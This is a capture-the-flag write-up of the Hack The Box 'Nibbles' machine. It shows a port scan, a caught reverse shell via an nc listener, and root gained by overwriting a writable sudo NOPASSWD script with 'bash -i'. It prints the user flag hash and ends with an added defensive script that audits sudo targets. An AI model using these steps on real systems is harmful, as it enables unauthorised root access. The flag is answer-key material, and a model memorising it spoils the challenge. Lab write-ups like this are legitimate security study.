nibbles


Introduction:

Recon

eneloop@kinetic:…/hackthebox/nibbles/data$ sudo nmap -sS -sC -sV -T4 -O -oN nmap.nibbles.txt 10.10.10.75
[sudo] password for eneloop:
Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-13 14:58 EST
Nmap scan report for 10.10.10.75
Host is up (0.014s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
|   256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_  256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.69 seconds

Enumeration

http://nibbles.htb/nibbleblog/content/private/config.xml

<notification_session_fail type="integer">0</notification_session_fail>
<notification_session_start type="integer">0</notification_session_start>
<notification_email_to type="string">[email protected]</notification_email_to>
<notification_email_from type="string">[email protected]</notification_email_from>
<seo_site_title type="string">Nibbles - Yum yum</seo_site_title>

http://nibbles.htb/nibbleblog/content/public/upload/

Exploitation

Post-exploit/PrivEsc

eneloop@kinetic:…/tools/reverse-shell/php$ nc -lvnp 4455
listening on [any] 4455 ...
connect to [10.10.14.38] from (UNKNOWN) [10.10.10.75] 39336
Linux Nibbles 4.4.0-104-generic #127-Ubuntu SMP Mon Dec 11 12:16:42 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
 19:21:40 up 4:15, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=1001(nibbler) gid=1001(nibbler) groups=1001(nibbler)
/bin/sh: 0: can't access tty; job control turned off
$ pwd
/
$ python -c 'import pty;pty.spawn("/bin/bash")'
/bin/sh: 5: python: not found
$ python3 -c 'import pty;pty.spawn("/bin/bash")'

nibbler@Nibbles:/$ sudo -l
sudo -l
Matching Defaults entries for nibbler on Nibbles:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin

User nibbler may run the following commands on Nibbles:
    (root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh
nibbler@Nibbles:/$

nibbler@Nibbles:/home$ cd /home/nibbler
cd /home/nibbler
nibbler@Nibbles:/home/nibbler$ ls -all
ls -all
total 20
drwxr-xr-x 3 nibbler nibbler 4096 Dec 29  2017 .
drwxr-xr-x 3 root    root    4096 Dec 10  2017 ..
-rw------- 1 nibbler nibbler    0 Dec 29  2017 .bash_history
drwxrwxr-x 2 nibbler nibbler 4096 Dec 10  2017 .nano
-r-------- 1 nibbler nibbler 1855 Dec 10  2017 personal.zip
-r-------- 1 nibbler nibbler   33 Feb 13 15:06 user.txt
nibbler@Nibbles:/home/nibbler$ cat user.txt
cat user.txt
5f60afdab7ea02eae737a1246e540ef0
nibbler@Nibbles:/home/nibbler$ unzip personal.zip
unzip personal.zip
Archive:  personal.zip
   creating: personal/
   creating: personal/stuff/
  inflating: personal/stuff/monitor.sh
nibbler@Nibbles:/home/nibbler$ cd personal
cd personal
nibbler@Nibbles:/home/nibbler/personal$ ls
ls
stuff
nibbler@Nibbles:/home/nibbler/personal$ cd stuff
cd stuff
nibbler@Nibbles:/home/nibbler/personal/stuff$ ls -l
ls -l
total 4
-rwxrwxrwx 1 nibbler nibbler 4015 May  8  2015 monitor.sh
nibbler@Nibbles:/home/nibbler/personal/stuff$ ls -all
ls -all
total 12
drwxr-xr-x 2 nibbler nibbler 4096 Dec 10  2017 .
drwxr-xr-x 3 nibbler nibbler 4096 Dec 10  2017 ..
-rwxrwxrwx 1 nibbler nibbler 4015 May  8  2015 monitor.sh
nibbler@Nibbles:/home/nibbler/personal/stuff$ cat monitor.sh

                  ####################################################################################################
                  #                                        Tecmint_monitor.sh                                        #
                  # Written for Tecmint.com for the post www.tecmint.com/linux-server-health-monitoring-script/      #
                  # If any bug, report us in the link below                                                          #
                  # Free to use/edit/distribute the code below by                                                    #
                  # giving proper credit to Tecmint.com and Author                                                   #
                  #                                                                                                  #
                  ####################################################################################################
#! /bin/bash
# unset any variable which system may be using

# clear the screen
clear

unset tecreset os architecture kernelrelease internalip externalip nameserver loadaverage

while getopts iv name
do
        case $name in
          i)iopt=1;;
          v)vopt=1;;
          *)echo "Invalid arg";;
        esac
done

if [[ ! -z $iopt ]]
then
{
wd=$(pwd)
basename "$(test -L "$0" && readlink "$0" || echo "$0")" > /tmp/scriptname
scriptname=$(echo -e -n $wd/ && cat /tmp/scriptname)
su -c "cp $scriptname /usr/bin/monitor" root && echo "Congratulations! Script Installed, now run monitor Command" || echo "Installation failed"
}
fi

if [[ ! -z $vopt ]]
then
{
echo -e "tecmint_monitor version 0.1\nDesigned by Tecmint.com\nReleased Under Apache 2.0 License"
}
fi

if [[ $# -eq 0 ]]
then
{


# Define Variable tecreset
tecreset=$(tput sgr0)

# Check if connected to Internet or not
ping -c 1 google.com &> /dev/null && echo -e '\E[32m'"Internet: $tecreset Connected" || echo -e '\E[32m'"Internet: $tecreset Disconnected"

# Check OS Type
os=$(uname -o)
echo -e '\E[32m'"Operating System Type :" $tecreset $os

# Check OS Release Version and Name
cat /etc/os-release | grep 'NAME\|VERSION' | grep -v 'VERSION_ID' | grep -v 'PRETTY_NAME' > /tmp/osrelease
echo -n -e '\E[32m'"OS Name :" $tecreset  && cat /tmp/osrelease | grep -v "VERSION" | cut -f2 -d\"
echo -n -e '\E[32m'"OS Version :" $tecreset && cat /tmp/osrelease | grep -v "NAME" | cut -f2 -d\"

# Check Architecture
architecture=$(uname -m)
echo -e '\E[32m'"Architecture :" $tecreset $architecture

# Check Kernel Release
kernelrelease=$(uname -r)
echo -e '\E[32m'"Kernel Release :" $tecreset $kernelrelease

# Check hostname
echo -e '\E[32m'"Hostname :" $tecreset $HOSTNAME

# Check Internal IP
internalip=$(hostname -I)
echo -e '\E[32m'"Internal IP :" $tecreset $internalip

# Check External IP
externalip=$(curl -s ipecho.net/plain;echo)
echo -e '\E[32m'"External IP : $tecreset "$externalip

# Check DNS
nameservers=$(cat /etc/resolv.conf | sed '1 d' | awk '{print $2}')
echo -e '\E[32m'"Name Servers :" $tecreset $nameservers

# Check Logged In Users
who>/tmp/who
echo -e '\E[32m'"Logged In users :" $tecreset && cat /tmp/who

# Check RAM and SWAP Usages
free -h | grep -v + > /tmp/ramcache
echo -e '\E[32m'"Ram Usages :" $tecreset
cat /tmp/ramcache | grep -v "Swap"
echo -e '\E[32m'"Swap Usages :" $tecreset
cat /tmp/ramcache | grep -v "Mem"

# Check Disk Usages
df -h| grep 'Filesystem\|/dev/sda*' > /tmp/diskusage
echo -e '\E[32m'"Disk Usages :" $tecreset
cat /tmp/diskusage

# Check Load Average
loadaverage=$(top -n 1 -b | grep "load average:" | awk '{print $10 $11 $12}')
echo -e '\E[32m'"Load Average :" $tecreset $loadaverage

# Check System Uptime
tecuptime=$(uptime | awk '{print $3,$4}' | cut -f1 -d,)
echo -e '\E[32m'"System Uptime Days/(HH:MM) :" $tecreset $tecuptime

# Unset Variables
unset tecreset os architecture kernelrelease internalip externalip nameserver loadaverage

# Remove Temporary Files
rm /tmp/osrelease /tmp/who /tmp/ramcache /tmp/diskusage
}
fi
shift $(($OPTIND -1))

nibbler@Nibbles:/home/nibbler/personal/stuff$ mv monitor.sh monitorbackup.sh
mv monitor.sh monitorbackup.sh
nibbler@Nibbles:/home/nibbler/personal/stuff$ ls -l
ls -l
total 4
-rwxrwxrwx 1 nibbler nibbler 4015 May  8  2015 monitorbackup.sh
nibbler@Nibbles:/home/nibbler/personal/stuff$

nibbler@Nibbles:/home/nibbler/personal/stuff$ echo "bash -i" > monitor.sh
echo "bash -i" > monitor.sh
nibbler@Nibbles:/home/nibbler/personal/stuff$ sudo /home/nibbler/personal/stuff/monitor.sh
<er/personal/stuff$ sudo /home/nibbler/personal/stuff/monitor.sh
whoami
root@Nibbles:/home/nibbler/personal/stuff# whoami
root
root@Nibbles:/home/nibbler/personal/stuff# ls
monitor.sh  monitorbackup.sh
root@Nibbles:/home/nibbler/personal/stuff# ls -l
total 8
-rwxr-xr-x 1 nibbler nibbler    8 Feb 13 19:32 monitor.sh
-rwxrwxrwx 1 nibbler nibbler 4015 May  8  2015 monitorbackup.sh
root@Nibbles:/home/nibbler/personal/stuff# pwd
/home/nibbler/personal/stuff
root@Nibbles:/home/nibbler/personal/stuff# cd /root
cd /root
root@Nibbles:~# ls
ls
root.txt
root@Nibbles:~# cat root.txt
cat root.txt
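
A defender's check for the misconfiguration visible in the `sudo -l` and `ls -l` output above, as an added example that is not part of the original write-up: it reads `sudo -l` output and reports every NOPASSWD target whose file or parent directories are missing, owned by an untrusted uid, or group/world-writable. `TRUSTED_UIDS`, `AUDIT_ROOT` and the function names are assumptions of this example, and the demo tree is constructed.

```shell
#!/bin/sh
# Added example: flag NOPASSWD sudo targets that a non-root user can replace.
# Assumes `stat -c` (GNU coreutils or BusyBox). TRUSTED_UIDS and AUDIT_ROOT are
# knobs made up for this example, not sudo settings.
TRUSTED_UIDS="${TRUSTED_UIDS:-0}"   # owners accepted on the target and its parents
AUDIT_ROOT="${AUDIT_ROOT:-/}"       # stop walking up at this directory

# Print one finding per problem with a single path component.
check_component() {
    if [ ! -e "$1" ]; then echo "$1: does not exist"; return 0; fi
    set -- "$1" $(stat -c '%u %a' -- "$1")    # $2 = owner uid, $3 = octal mode
    case " $TRUSTED_UIDS " in *" $2 "*) ;; *) echo "$1: owned by untrusted uid $2" ;; esac
    # Group/world-writable is a finding, except sticky directories such as /tmp.
    if [ $(( 0$3 & 022 )) -ne 0 ] && ! { [ -d "$1" ] && [ $(( 0$3 & 01000 )) -ne 0 ]; }; then
        echo "$1: mode $3 is group/world-writable"
    fi
}

# Walk from the target up to AUDIT_ROOT: a writable parent allows rename and replace.
audit_path() {
    p=$1
    while :; do
        check_component "$p"
        case $p in "$AUDIT_ROOT"|/|.) break ;; esac
        p=$(dirname -- "$p")
    done
}

# Read `sudo -l` output on stdin; print findings and return 1 if there are any.
audit_sudo_list() {
    report=$(sed -n 's/.*NOPASSWD:[[:space:]]*//p' | tr ',' '\n' |
        while read -r cmd _; do        # first word is the command path
            case $cmd in (/*) ;; (*) continue ;; esac   # skip ALL and aliases
            findings=$(audit_path "$cmd")
            [ -z "$findings" ] || printf 'FINDING %s\n%s\n' "$cmd" "$findings"
        done)
    [ -z "$report" ] && return 0
    printf '%s\n' "$report"; return 1
}

# Constructed demo: the page's file layout and mode, rebuilt under a temp dir.
demo() {
    umask 022; d=$(mktemp -d) && mkdir -p "$d/personal/stuff" || return 2
    f="$d/personal/stuff/monitor.sh"; echo uptime > "$f"; chmod 777 "$f"
    printf '    (root) NOPASSWD: %s\n' "$f" |
        ( TRUSTED_UIDS="0 $(id -u)"; AUDIT_ROOT=$d; audit_sudo_list )
    rc=$?; rm -rf "$d"; return "$rc"
}
demo || echo "demo exit status $? (1 means findings were reported)"
```

On a real host, run it as root with `sudo -l -U <user> | audit_sudo_list` and the default `TRUSTED_UIDS=0`, so that a target living under a user's home directory is reported at every component that user owns.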

Notes: